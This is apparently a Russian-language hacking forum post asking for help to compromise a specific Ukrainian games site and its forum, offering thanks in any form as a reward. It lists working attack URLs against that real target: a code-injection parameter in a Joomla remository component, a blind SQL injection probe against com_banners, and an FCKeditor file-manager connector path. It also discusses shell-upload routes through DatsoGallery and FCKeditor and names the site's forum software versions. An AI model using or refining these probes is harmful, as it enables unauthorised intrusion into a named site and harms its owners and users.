Господа, помогите раскрутить. С меня - миллион благодарностей в любом эквиваленте.
Код:
http://games.onet.ua/index.php?option=com_remository&Itemid=-1&func=;die%28%29;select&id=-1
Я ошибаюсь, или там выполнение кода? Хсс, очевидно. Это, к сожалению, та версия, где еще нет sql в selectcat, исходники этой достать не смог. На том же хосте есть datsogallery, предположительно уязвимая к аплоаду шеллов, но она post-auth, регистрация закрыта, а пасс ни одного из малочисленных юзеров не известен.
Код:
http://games.onet.ua/index.php?option=com_banners&task=archivesection&id=0%27+and+%271%27=%271
Предположительно уязвимая к blind sqli версия com_banners, однако проверить не удалось.
Код:
http://forum.onet.ua/fckeditor/editor/filemanager/browser/default/browser.html?connector=../../connectors/php/connector.php
fckeditor. вроде не позволяет просто так грузить пхп, .htaccess залить также не осилил. могу ошибаться.
Крутится SMF 2.0 RC-3 на пару с tinyportal 1.0-r1.